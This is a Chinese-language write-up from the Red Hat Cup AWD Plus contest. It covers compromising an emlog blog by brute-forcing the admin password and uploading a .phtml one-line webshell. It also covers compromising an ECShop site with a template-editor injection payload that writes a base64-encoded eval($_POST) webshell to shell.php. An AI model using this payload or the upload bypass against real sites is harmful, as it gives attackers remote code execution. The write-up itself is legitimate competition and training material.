红帽杯线下AWD plus writeup

访问是一个由emlog的博客站点。

直接访问后台，得知存在admin用户对admin进行暴力破解

上传附件处限制了文件类型，发现可添加允许添加后缀名。尝试了php，php5等类似添加后，都会被更改为x类型，最后尝试添加phtml，成功添加。

然后直接去写文章处添加附件，并上传后缀为pthml的一句话

成功上传后，右键附件复制链接地址，上菜刀，成功getshell。并在根目录下找到flag

粤湾租赁

访问web题目，系统为ecshopcms，发现两个登录处，一个是前台登陆，一个是后台登陆，前台登陆并未发现什么可以拿下的点。

已知存在admin用户，进行爆破

ecshop有已知的getshell方法，

直接在模板管理–语言项编辑直接修改来写入shell文件；搜索关键字：用户信息；用户信息四个字一定不要删除，在之后添加：(base64加密去掉了最后的=号)

1.${${fputs(fopen(base64_decode(c2hlbGwucGhw),w), base64_decode(PD9waHAgZXZhbCgkX1BPU1RbJ2gnXSk7Pz3))}}

而后保存，保存后访问user.php即可在根目录下生成shell.php的shell。然后上菜刀，成功在根目录获得flag。